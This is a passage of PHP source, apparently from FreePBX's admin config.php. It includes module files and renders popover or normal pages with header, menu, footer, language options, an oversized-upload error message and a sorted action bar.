866 echo sprintf(_("File %s has a revoked signature. Can not load"),$module_file);
867 break;
868 } else {
869 // load language info if available
870 modgettext::textdomain($module_name);
871 if ( isset($currentcomponent) ) {
872 $bmo->GuiHooks->doGUIHooks($module_name, $currentcomponent);
873 }
874 if ($bmo->GuiHooks->needsIntercept($module_name, $module_file)) {
875 $bmo->Performance->Start("hooks-$module_name-$module_file");
876 $bmo->GuiHooks->doIntercept($module_name, $module_file);
877 $bmo->Performance->Stop("hooks-$module_name-$module_file");
878 } else {
879 $bmo->Performance->Start("includefile-$module_file");
880 include($module_file);
881 $bmo->Performance->Stop("includefile-$module_file");
882 }
883 }
884 } else {
885 echo sprintf(_("404 Not found (%s)"),$module_file);
886 }
887
888 // BMO TODO: Post display hooks.
889 $bmo->GuiHooks->getPostDisplay($module_name, $_REQUEST);
890
891 // global component
892 if ( isset($currentcomponent) ) {
893 modgettext::textdomain($module_name);
894 echo $currentcomponent->generateconfigpage();
895 }
896 }
897 break;
898}
899
900$header = array();
901$footer = array();
902
903if ($quietmode) {
904 // send the output buffer, should be sending just the page contents
905 @ob_end_flush();
906} elseif ($fw_popover || $fw_popover_process) {
907 $admin_template = $template = array();
908 //get the page contents from the buffer
909 $content = ob_get_contents();
910 @ob_end_clean();
911 $fw_gui_html = '';
912
913 // add header
914 // Taken as is from the else just below this elseif
915 // We're sending the popover, it needs a header if only for jQuery.
916 // Already ok to pass popover awareness to header so popover.css is added
917 $header['title'] = framework_server_name();
918 $header['amp_conf'] = $amp_conf;
919 $header['use_popover_css'] = ($fw_popover || $fw_popover_process);
920 $o = FreePBX::create()->Less->generateMainStyles();
921 $header['compiled_less_files'] = $o['compiled_less_files'];
922 $header['extra_compiled_less_files'] = $o['extra_compiled_less_files'];
923
924 //if we have a module loaded, load its css
925 if (isset($module_name)) {
926 $fw_gui_html .= framework_include_css();
927 $header['module_name'] = $module_name;
928 }
929
930 show_view($amp_conf['VIEW_HEADER'], $header);
931
932 // If processing posback (fw_popover_process) and there are errors then we
933 // display again, otherwise we ignore the $content and prepare to process
934 //
935 $show_normal = $fw_popover_process ? fwmsg::errors() : true;
936 if ($show_normal) {
937 // provide beta status
938 if (isset($fpbx_menu[$display]['beta']) && strtolower($fpbx_menu[$display]['beta']) == 'yes') {
939 //TODO: Why is this in a global system variable?
940 $fw_gui_html .= load_view($amp_conf['VIEW_BETA_NOTICE']);
941 }
942 $fw_gui_html .= $content;
943 $popover_args['popover_mode'] = 'display';
944 } else {
945 $popover_args['popover_mode'] = 'process';
946 }
947
948 //send footer
949 $o = FreePBX::create()->View->getScripts();
950 $footer['compiled_scripts'] = $o;
951 $footer['js_content'] = load_view($amp_conf['VIEW_POPOVER_JS'], $popover_args);
952 $footer['lang'] = $language;
953 $footer['covert'] = in_array($display, array('noauth', 'badrefer')) ? true : false;
954 $footer['extmap'] = !$footer['covert']
955 ? framework_get_extmap(true)
956 : json_encode(array());
957 $footer['module_name'] = $module_name;
958 $footer['module_page'] = $module_page;
959 $footer['benchmark_starttime'] = $benchmark_starttime;
960 $footer['reload_needed'] = false; //we don't display the menu in this view so irrelivant
961 //These changes will hide the excess footer which is just empty anyways, also it sets our body background to transparent
962 //scripts in footer are still run eventhough it's hidden
963 //hack into the footer and change the background to be transparent so it seems like we "belong" in the dialog box
964 $footer['footer_content'] = "<script>$('body').css('background-color','transparent');$('#footer').hide()</script>";
965 $footer['remove_rnav'] = true;
966 $fw_gui_html .= load_view($amp_conf['VIEW_FOOTER'], $footer);
967 echo $fw_gui_html;
968
969} else {
970 // Save the last module page normal view in the session. This is needed in some scenarios
971 // such as a post back within a popOver destination box so that the drawselects() can be
972 // properly generated within the context of the parent window that it will be filled back
973 // in with.
974 //
975 $_SESSION['module_name'] = $module_name;
976 $_SESSION['module_page'] = $module_page;
977
978 $admin_template = $template = array();
979 //get the page contents from the buffer
980 $page_content = ob_get_contents();
981 ob_end_clean();
982
983 //add header
984 $header['title'] = framework_server_name();
985 $header['amp_conf'] = $amp_conf;
986 $header['use_popover_css'] = ($fw_popover || $fw_popover_process);
987
988 $o = FreePBX::create()->Less->generateMainStyles();
989 $header['compiled_less_files'] = $o['compiled_less_files'];
990 $header['extra_compiled_less_files'] = $o['extra_compiled_less_files'];
991
992 //if we have a module loaded, load its css
993 if (isset($module_name)) {
994 $header['module_name'] = $module_name;
995 }
996
997 echo load_view($amp_conf['VIEW_HEADER'], $header);
998
999 if (isset($module_name)) {
1000 echo framework_include_css();
1001 }
1002
1003 // send menu
1004 $menu['fpbx_menu'] = $fpbx_menu; //array of modules & settings
1005 $menu['display'] = $display; //currently displayed item
1006 $menu['authtype'] = $amp_conf['AUTHTYPE'];
1007 $menu['reload_confirm'] = $amp_conf['RELOADCONFIRM'];
1008 $menu['language'] = array(
1009 'en_US' => _('English'). " (US)"
1010 );
1011 $langKey = !empty($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en_US';
1012 foreach(glob($amp_conf['AMPWEBROOT']."/admin/i18n/*",GLOB_ONLYDIR) as $langDir) {
1013 $lang = basename($langDir);
1014 $menu['language'][$lang] = function_exists('locale_get_display_name') ? locale_get_display_name($lang, $langKey) : $lang;
1015 }
1016
1017 //add menu to final output
1018 echo load_view($amp_conf['VIEW_MENU'], $menu);
1019
1020 // provide beta status
1021 if (isset($fpbx_menu[$display]['beta']) && strtolower($fpbx_menu[$display]['beta']) == 'yes') {
1022 echo load_view($amp_conf['VIEW_BETA_NOTICE']);
1023 }
1024
1025 //FREEI-918 - if the uploaded file's size exceeds php's post_max_size, PHP drops
1026 //the _POST and _FILES values and continues with the request. There is no error value
1027 //to properly know what happened. Meeting this set of conditions is enough evidence
1028 //to assume module upload from Module Admin failed due to the file being too large.
1029 //The page_content is being overwritten to display an error and option to try again,
1030 //instead of going back to the admin dashboard/index
1031 if ((preg_match('/config.php\?display=modules&action=upload/', $_SERVER['HTTP_REFERER'])
1032 || preg_match('/config.php\?display=updates&action=upload/', $_SERVER['HTTP_REFERER'])) &&
1033 empty($_FILES) && empty($_POST) && $_REQUEST['display'] === 'index' &&
1034 $_SERVER['CONTENT_LENGTH'] > 0)
1035 {
1036 $postMaxSize = ini_get('post_max_size');
1037 $page_content =
1038 '<div class="error">
1039 <p>' .
1040 _("There was an error uploading the module tar ball due to its size being greater than post_max_size {") . $postMaxSize . '}.<br>'.
1041 _("Please host the file and use the \"Download (From Web) option\", or ssh to your FreePBX system and use
1042 \"fwconsole ma downloadinstall [url]\" to install the module from a URL.") . "<br>" .
1043 _("For further help, please contact") .
1044 " <a href=\"https://support.sangoma.com\" target=\"_blank\">" . _("Sangoma Support") . "</a>."
1045 .
1046 '</p>
1047 <input type="button" value="' . _("Go Back") . '" onclick="history.back()">
1048 </div>';
1049 }
1050
1051 //send actual page content
1052 echo $page_content;
1053
1054 //send footer
1055 $o = FreePBX::create()->View->getScripts();
1056 $footer['compiled_scripts'] = $o;
1057 $footer['lang'] = $language;
1058 $footer['covert'] = in_array($display, array('noauth', 'badrefer')) ? true : false;
1059 $footer['extmap'] = !$footer['covert'] ? framework_get_extmap(true) : json_encode(array());
1060 $footer['module_name'] = $module_name;
1061 $footer['module_page'] = $module_page;
1062 $footer['benchmark_starttime'] = $benchmark_starttime;
1063 $footer['reload_needed'] = $footer['covert'] ? false : check_reload_needed();
1064 $footer['footer_content'] = load_view($amp_conf['VIEW_FOOTER_CONTENT'], $footer);
1065
1066 if (!$footer['covert'] && function_exists("sysadmin_hook_framework_footer_view")) {
1067 $footer['sysadmin'] = sysadmin_hook_framework_footer_view();
1068 }
1069
1070 $footer['covert'] ? $footer['no_auth'] = true : '';
1071
1072 $footer['action_bar'] = null;
1073 //See if we should provide an action bar
1074 try {
1075 $bmomodule_name = $bmo->Modules->cleanModuleName($module_name);
1076 if($bmo->Modules->moduleHasMethod($bmomodule_name,"getActionBar")) {
1077 $ab = $bmo->$bmomodule_name->getActionBar($_REQUEST);
1078 if(is_array($ab)) {
1079 //submit, duplicate, reset, delete.
1080 //http://issues.freepbx.org/browse/FREEPBX-10611
1081 uksort($ab, function($a, $b) {
1082 $order = array(
1083 "submit",
1084 "duplicate",
1085 "reset",
1086 "delete"
1087 );
1088 $posA = array_search($a, $order);
1089 if($posA === false) {
1090 $posA = 999;
1091 }
1092 $posB = array_search($b, $order);
1093 if($posB === false) {
1094 $posB = 999;
1095 }
1096 return ($posA < $posB) ? -1 : 1;
1097 });
1098 $footer['action_bar'] = $ab;
1099 } else {
1100 $footer['action_bar'] = array();
1101 }
1102 }
1103 } catch (Exception $e) {
1104 //TODO: Log me
1105 }
1106 $footer['nav_bar'] = null;
1107 //See if we should provide an action bar
1108 try {
1109 $bmomodule_name = $bmo->Modules->cleanModuleName($module_name);
1110 if($bmo->Modules->moduleHasMethod($bmomodule_name,"getRightNav")) {
1111 $footer['nav_bar'] = $bmo->$bmomodule_name->getRightNav($_REQUEST);
1112 }
1113 } catch (Exception $e) {
1114 //TODO: Log me
1115 }
1116 echo load_view($amp_conf['VIEW_FOOTER'], $footer);
1117}